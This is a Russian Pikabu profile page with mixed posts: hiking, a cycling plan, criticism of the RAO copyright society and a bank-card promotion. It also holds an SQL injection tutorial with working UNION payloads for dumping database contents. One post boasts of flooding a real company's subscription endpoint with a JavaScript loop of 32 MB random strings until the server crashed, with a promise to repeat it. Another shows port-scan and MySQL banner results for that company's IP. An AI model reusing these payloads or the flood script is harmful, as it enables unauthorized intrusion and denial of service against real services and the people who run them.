ser60v

ser60v

пикабушник
поставил 427 плюсов и 2548 минусов
отредактировал 5 постов
проголосовал за 5 редактирований
35К рейтинг 9714 комментариев 76 постов 32 в "горячем"
2

Зимние скалы.

Достало прогать, прогулялись до `Больших скал`.

200 минут в 7 секунд, да немного фоточек.

Таймлапс работал 8 часов, но осмысленные только 200 минут. В темноте вообще ничего не вытянуло. Ну, на то и тесты.


Снегу пол метра-метр, но он таял-замерзал и наст нормально держит человека, хоть пару раз и пришлось провалиться по пояс.

Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия
Зимние скалы. Туризм, Снег, Ястребиное, Гифка, Длиннопост, Карелия

Птыца ешъ!

Показать полностью 12
47

Поддержите упоротого

Я хочу доехать от СПБ до Москвы на велосипеде без остановки (в плане глобальной, а не вообще, а то слишком уж много воды везти придётся).


Прошлый клич почему-то не зашел. Но прошу в действительности я не многого.

Пожалуйста помогите слегка поднять пост без рейтинга, дабы получить отклик от интересных людей из Великого Новгорода.


Сегодня я окончательно понял что буду пробовать.

Не знаю получится или нет осуществить задачу, но я буду пробовать и планирую подойти к неадекватной задаче максимально адекватно.


Трек на 1000км не такой и непреодолимый, если идти его на циклокроссе порожняком.

В связи с этим у меня запланирован сброс веса, наблюдение у медиков в период тренировок, да собственно тренировки, один из этапов у которых:


- Доехать до Новгорода за субботу

- Вернуться в Санкт-Петербург за воскресенье

- Повторить пока не станет скучно


Поэтому хотелось бы получить связь с разнообразными интересными людьми, которые бы готовы были встретить в Новгороде. Я просто мерю это со своей колокольни и если бы мне предложили в Спб принять упоротого велосипедиста, с радостью бы принял.


На деле мне нужно лишь сходить в душ, возможность доступа к плите и угол куда упасть, да поставить велосипед.



Для остальных пикабушников обещаю отчёты, постараюсь разобраться с таймлапсом, дабы в итоге сделать таймлапс СПБ-Москва на вело, если на это не выйдет запредельного излишнего веса + возможных поломок в пути на которые придётся тратить время.


От себя добавлю что верю в успех

- Есть опыт 350км за день.

- Есть опыт 130км не слезая с вело

- Есть опыт не спать по трое суток

- Есть опят доехать но НСК на вело

30

Привет Великий Новгород

Я немного засиделся за компом и надо слегка голову проветрить. Посему как слегка теплее станет, что днём не будет холоднее +5, хочу начать каждую субботу ездить СПБ-Новгород, а воскресенье обратно на педалях, пока не наберу готовности возвращаться не останавливаясь на ночёвку.

Привет Великий Новгород Велосипед, Туризм, Великий Новгород, Без рейтинга

Так - конечная цель, набрать форму чтоб прокатиться до москвы без остановки. Думаю за 35-40 часов это осуществимо. Но ехать до Москвы думаю надо где-то в конце Июня, дабы был максимальный световой день и к тому моменту надо разобраться как у меня поживает сейчас колено, да вообще послушать организм.


Посему ищу тех к кому можно было бы упасть поспать в Новгороде, да потравить байки за чашечкой чая.

Я мирный, есть отзывы от тех кто приютил, когда ездил до Новосибирска.

Без рейтинга, просто хотелось бы найти так варианты слегка социализировать выходные, а то крыша от проги уже вообще в край едет )

30

Какая-то выборочная работа модератора

Какая-то выборочная работа модератора Реклама, Без рейтинга, WTF

Я не знаток, может чего не знаю, может вышли новые правила какие на пикабу. Но ни автор, ни модератор ни случайные прохожие мне ответ не дали. Только автор добавил в игнор, видимо дабы я больше не мог повторить свой вопрос.


Я ничего не имею против какой либо рекламы, когда реклама всёж интересная.


Канские львы тому пример, можно рассматривать рекламу как творчество.

Но блин. Этот пост рассматривается скорее как магазин на диване, к тому же он попадает в горячее.


У данного автора большинство постов - это "магазин на диване" со ссылкой на ресурс где можно заказать. И в принципе к автору вопросов нет, потому как зачем делать интересную подачу материала если и так получается привлечь клиентуру.


Вопрос к @moderator, это законно?) Если да, то у меня есть идея запулить ботов для smm в маркетинге через пикабу.


А на деле - если администрация не имеет ничего против, то я попросту кидаю подобных авторов в игнор. Если имеет, то как получилась подобная ситуация?

Показать полностью
1383

Немного о Российском Авторском Обществе

Вчера заметил сразу два поста связанные с РАО:

про такси

про отъевших ухи


И чёто как-то знатно прихуел озадачился...

Решил поискать а что это за ребята вообще такие. И в общем-то попал на их сайт.

Местами даже как-то здраво написано, но всё равно что-то напрягает...

Например, почему хозяин кафе должен платить данным лицам отчисления если у них в кафе есть радио?.. Неужели на радио не платят авторские отчисления?.. Начинает пахнуть мутью.

Немного о Российском Авторском Обществе РАО, Авторские права, Суд, Музыка, Авторские отчисления, Негатив, Длиннопост

Вот, у них даже прайс интересный есть на сайте, погодите погодите... Особенно нравится пункт 3... Наверное речь про каверы, но нигде это не указано.


Пока я изучал их сайт ребята казались всё мутнее и мутнее, решил обратиться к вики, вдруг там есть что конкретнее, так вот существуют они с 1993 года. При том, у них очень интересная заявлена формулировка.


При этом РАО имеет право «защищать права» неопределённого круга правообладателей вне зависимости от того, заключили ли они с РАО договор или нет

Я конечно не знаток, но не пахнет ли тут навязыванием услуги? Да и каким образом до правообладателя доходят деньги, так ещё и не понимаю.


7 октября 1993 Президент РФ (Б. Н. Ельцин) своим указом ликвидировал РАИС, объявил его правопреемником Российское авторское общество (РАО) и определил, что РАО находится под покровительством Президента РФ

Уже интереснее. При том время такое, когда всё делалось строго для народа и по совести.


Можно копать долго откуда берут корни эти господа, но толку от этого не прибавится. Давайте лучше посмотрим, каких же результатов добились ребята за своё существование? Как же помогли правообладателям, которых незаконно обворовывают?

Немного о Российском Авторском Обществе РАО, Авторские права, Суд, Музыка, Авторские отчисления, Негатив, Длиннопост
8 марта 2009 года в Ростове-на-Дону состоялся концерт арт-группы «Хор Турецкого», в ходе которого были публично исполнены 27 произведений российских и иностранных авторов. Организатором концерта являлось ООО «Юг-Арт». Лицензионный договор с РАО заключён не был. Южный филиал РАО 21 апреля 2009 года обратился в Кировский суд г. Ростов-на-Дону с иском в защиту прав авторов исполненных на концерте произведений. При этом в иске авторами песни «Город золотой» были ошибочно указаны Леонид Каганов и Борис Гребенщиков, от имени которых, и без их ведома, был подан иск
19 июня 2009 года суд постановил взыскать с ООО «Юг-Арт» компенсацию за каждый случай бездоговорного использования охраняемых произведений. Всего размер взысканной с ответчика компенсации составил 810 000 рублей. Кроме того, были взысканы: 8 115 рублей — госпошлина и 3 000 рублей — стоимость билетов на концерт
Кировский районный суд Ростова-на-Дону вынес 15 июня 2009 года решение, согласно которому организатор концерта группы «Deep Purple» в этом городе 19 октября 2008 года — ООО «Юг-Арт» использовало пятнадцать произведений Deep Purple без договора с РАО.

Оказывается Deep Purple это Российская группа. Странно что не часто выступают у нас на родине...


В марте 2010 года прокуратура по заявлению Российского авторского общества предъявила претензии организаторам бесплатного концерта хора ветеранов в Самаре, потребовав выплаты вознаграждения авторам за публичное исполнение песен военных лет. Недоумение действиями РАО выразили композитор Оскар Фельцман, а также ряд известных политиков.
Весной 2010 года РАО подало в суд на кинотеатр в Каменске-Уральском за то, что там демонстрировались фильмы «Аватар», «Шерлок Холмс», «Книга Илая», «Чёрная молния» без заключения договоров о вознаграждении обладателям прав на музыку, использованную в фильмах. При этом кинотеатром были заключены официальные договоры с обладателями прав на сами фильмы — ООО «Юниверсал Пикчерз Интернэшнл», ООО "Кинокомпания «Каро Премьер». РАО рассмотрело это как правонарушение, предусмотренное частью 1 статьи 7.12 КОАП РФ и добилось изъятия оборудования кинотеатра и наложило штраф в размере 30 тысяч рублей.
Немного о Российском Авторском Обществе РАО, Авторские права, Суд, Музыка, Авторские отчисления, Негатив, Длиннопост
В конце 2011 года РАО подало иски против Московской, Свердловской и Нижнетагильской филармоний. Особенностью исков было то, что РАО фактически требовало от филармоний выплаты авторских вознаграждений за произведения классиков, живших несколько веков назад

Ну и в конце концов ребятами заинтересовался не только я... Не только мне они показались достаточно мутными...


В 2015 году Главное управление экономической безопасности уже проводило проверку РАО по факту хищения авторских средств. Весной 2016 МВД и прокуратура Москвы проверили деятельность обществ по коллективному управлению авторскими правами — РАО, Российского союза правообладателей (РСП) и Всероссийской организации интеллектуальной собственности (ВОИС). Проверка проводилась по запросу депутата Госдумы Сергея Обухова. По его данным, за время работы РАО, РСП и ВОИС «более 10 млрд руб. не дошло до авторов, исполнителей, создателей фонограмм и иных правообладателей»

27 июня 2016 года в офисе РАО на Большой Бронной (г. Москва) работали правоохранительные органы, проводился обыск, шла выемка служебных документов. В доме руководителя РАО Сергея Федотова, в этот день также проходили следственные действия.[36] 28 июня МВД РФ сообщило о задержании гендиректора РАО С. С. Федотова по подозрению в мошенничестве (часть 4 статьи 159 УК РФ) в особо крупных размерах, по предварительной оценке, ущерб от действий главы РАО превышает 500 млн рублей.

И вот встаёт резонный вопрос... Какого хера?.. Я конечно не являюсь правообладателем, но огонь в области моей задницы способен растопить полярные льды.

Может есть на пикабу способный дать внятные комментарии? Может я чего-то просто не понимаю, а они современные робингуды?..

Показать полностью 2
612

Как ломать сайты криворуких программистов.

Ломать сайты можно множеством способов, но один из самых простых и эффективных, если программист достаточно криворукий это SQL-инъекции

Давайте же немного обсудим данную тему.


Для того чтобы понять что тут происходит в принципе не нужно уметь программировать, знать SQL язык. Достаточно быть не сильно идиотом.


Что из себя представляют SQL инъекции? Это некие неправомерные действия, которые не предполагались выполняться данным скриптом.


Если привести пример из реальности, то это будет нечто такое:

Мать написала отцу записку:

Купи Васе конфет

А Вася взял и дописал: " и Пива"

В итоге отец видит записку:

Купи Васе конфет и Пива

Конечно когда прочитают логи и сверят данные Вася получит ремня, но временно он взломал систему. (поэтому правило первое, старайтесь действовать так чтоб вас не спалили)



Тут я подготовил простенький интерфейс на котором можно побаловаться:

https://test.ser60v.ru/injection/

По нормальному мы можем добавить строку, либо вытащить данные по поиску данной строки, дабы каждый ещё смог оставить немного своей дури:

Как ломать сайты криворуких программистов. SQL injection, SQL, Web-Программирование, Взлом, Длиннопост, Mysql, Хакеры
Как ломать сайты криворуких программистов. SQL injection, SQL, Web-Программирование, Взлом, Длиннопост, Mysql, Хакеры

Попробуем в поле поиска вбить не ololo

а

ololo' -- pikabu

Вывод выдаёт то же самое, итого мы можем применять инъекции.

В коде на сервере запрос выглядит так


SELECT * FROM `example` WHERE `text`='$find'

Мы же сами закрываем кавычки и комментируем всё последующее двумя дефисами.

Профит.


Что же мы можем сделать теперь?

Например добавить свой вывод:


' AND 0>1 UNION SELECT 1,2 -- pikabu

В этом случае мы выводим 1,2, но кому это интересно?

Если уж мы получили делать возможность инъекции необходимо узнать структуру базы, дабы получить возможность формировать желаемые запросы.


Получаем список баз

' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(table_schema)), 1 FROM information_schema.columns WHERE ''='
Как ломать сайты криворуких программистов. SQL injection, SQL, Web-Программирование, Взлом, Длиннопост, Mysql, Хакеры

Таким запросом мы получим список баз к которым у данного пользователя есть доступ.


Тут в принципе не нужно ничего понимать, мы выводим столько же полей, потому как знаем что у нас их 2. Но в первое выводим через запятую все базы, к которым можем получить доступ.


Отлично, мы знаем что наша база называется injection


Теперь получим список таблиц нашей базы


' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(table_name)), 1 FROM information_schema.columns WHERE table_schema='injection' and ''='
Как ломать сайты криворуких программистов. SQL injection, SQL, Web-Программирование, Взлом, Длиннопост, Mysql, Хакеры

Получаем список колонок из таблицы secret

' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(column_name)), 1 FROM information_schema.columns WHERE table_schema='injection' and table_name='secret' and ''='


Их внезапно тоже 2, так что не парясь можно получить всё содержимое.


' AND 0>1 UNION SELECT * FROM secret WHERE ''='

Много воли я решил не давать вам на сервере, например нет возможности редактировать структуру базы, создавать новые таблицы, удалять строки. Иначе начнётся тотальный треш.


В сущности, сейчас найти данную уязвимость практически невозможно. Но всякое в жизни бывает...


Так например было дело, на каком-то ресурсе удалось при редактировании своего пароля установить такой пароль всем, потому как было что-то типа:

UPDATE `users` SET `password`='$password' WHERE id=$id

Ну и если мы делаем переменную $password

newPass' -- ololo

То пароль newPass ставится для всех пользователей.



Защититься от инъекций куда проще, чем их использовать, но если доступ к оным получен - это дарует много возможностей.

Если кто-то сможет сделать insert/update в таблицу secret каким-то образом - с меня пиво первому сделавшему..)

Показать полностью 3
19

Сильная реакция `разработчиков` Кэшберри

http://gdc.group/ вновь в строю и можно попытаться добавить свой email для рассылки.

Но проблема в том что с какого бы я ip бы ни пробовал добавлять что либо - ответ от сервера:


<div class="success">Вы успешно подписаны на новости.</div>

Готов поставить что модификация кода выполнена такой строчкой:


echo '<div class="success">Вы успешно подписаны на новости.</div>'; /*

Похоже у админа ушла неделя на осознание проблем с сервером, ну либо его только сейчас пнули...


Те на текущий момент инъекции думаю можно даже не пробовать, потому как я думаю там попросту нет соединения с базой и стоит заглушка выводящая на экран одно и тоже вне зависимости от обращения...


Интересно на сколько у них дела обстоят с паролями, но брутить это не серьезно. Из очевидных вещей даже не знаю куда там можно смотреть.


По возможности не будьте ретардами =\


Discovered open port 80/tcp on 78.47.156.63
Discovered open port 443/tcp on 78.47.156.63
Discovered open port 22/tcp on 78.47.156.63
Discovered open port 3306/tcp on 78.47.156.63
$ telnet 78.47.156.63 3306
Trying 78.47.156.63...
Connected to 78.47.156.63.
Escape character is '^]'.
R
5.5.56-MariaDB�T G&&,Kr|9� � H;1$\'L**3bumysql_native_password

Если кому либо интересна тема инъекций, могу разлениться, да у себя на сервере собрать уязвимый к ним скрипт, да пояснить как оно работает и приложить несколько экзамплов.


Пишите тесты и делайте своевременные дампы...

Будем ждать у них более интересного ресурса, который можно потестить...

7225

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

27

Есть ли что-то, на что Чечены не обижаются?

Если вкратце - выходит переиздание настольной игры Vampire: The Masquerade

И чечены обиделись на то что действие будет происходить на территории Чечни. Что это страх божий чечены - вампиры.

Чечня в Мире Тьмы выставлена адом на земле, где вампиры-борцухи открыто облагают жителей налогом на кровь, пропадают люди, а всем заправляет некий Султан Рамзан и всё это курируется Камарильей. В целом всё довольно клюквенно.

Есть ли что-то, на что Чечены не обижаются? Поехавшие новости, Настольные игры, Игры, Чечня, Видео

У «Пикабу» будет своя банковская карта, и вы можете выбрать ее уникальный дизайн

У «Пикабу» будет своя банковская карта, и вы можете выбрать ее уникальный дизайн Длиннопост

У каждого большого классного сообщества должны быть свой маскот и свой мерч. А что, если бы еще была своя дебетовая карта с уникальным дизайном? Вместе с «Тинькофф Банком» мы планируем выпустить такую карту — специально для пикабушников.


У нас есть несколько идей дизайна карты, но нам хочется, чтобы ее внешний вид был по душе как можно большему числу пикабушников (а иначе какой смысл все это затевать!). Вы даже можете предложить свой вариант, и, если другие пикабушники его одобрят, мы нарисуем макет карты по вашей идее. А теперь давайте обо всем по порядку.


Почему именно «Тинькофф Банк»?

Потому что у «Тинькофф Банка» есть крутая дебетовая карта Tinkoff Black. Хороший кешбэк в рублях, процент на остаток каждый месяц, партнерские предложения и акции, удобное мобильное приложение. Если вы никогда не слышали о карте Tinkoff Black, прочитайте о ее преимуществах в этом посте, и сразу поймете, почему мы выбрали именно ее.

У «Пикабу» будет своя банковская карта, и вы можете выбрать ее уникальный дизайн Длиннопост

А кроме плюшек самой карты и уникального дизайна что-то есть?

Есть. От «Тинькофф Банка» вы получите полгода бесплатного обслуживания карты, а от нас — набор пикабушных стикеров с Печенькой (они отлично смотрятся на ноутбуках и чехлах для смартфонов).


Окей, как я могу предложить свой дизайн?

Прислать прямо нам на почту editorial@pikabu.ru. Опишите свою идею словами или нарисуйте, если вам так проще. Умеете рисовать только схематично карандашом на бумаге — сгодится! Словом, предлагайте вашу идею так, как вам удобнее. Главное, чтобы задумка была понятна. Присылая нам свою идею, вы соглашаетесь, что она будет участвовать в конкурсе. А полные правила страшным языком вот тут по ссылке.

У «Пикабу» будет своя банковская карта, и вы можете выбрать ее уникальный дизайн Длиннопост

Но как вы узнаете, по каким идеям рисовать макеты карт?

Мы возьмем все предложенные идеи, отрисуем по ним макеты и добавим их к нашим вариантам. Когда все будет готово, мы устроим всепикабушное голосование за лучший дизайн карты.


А карту можно предзаказать?

Да! И даже нужно. Мы ведь должны понимать, сколько людей хотят получить себе такой драгоценный артефакт, как банковская карта с Печенюхой! Чтобы приступить к выпуску карты, нам нужно собрать хотя бы 1001 предзаказ.

У «Пикабу» будет своя банковская карта, и вы можете выбрать ее уникальный дизайн Длиннопост

Но у меня уже есть карта Tinkoff Black. Я в пролете?

Нет. Вы можете дождаться, когда выйдет карта «Пикабу», и перевыпустить свою Tinkoff Black в новом дизайне. Ну или выпустить ее в качестве дополнительной карты, как хотите. В любом случае вы ничего не потеряете.


Ладно, вы меня убедили, предзаказываю. Куда нажимать?

Показать полностью 3
Отличная работа, все прочитано!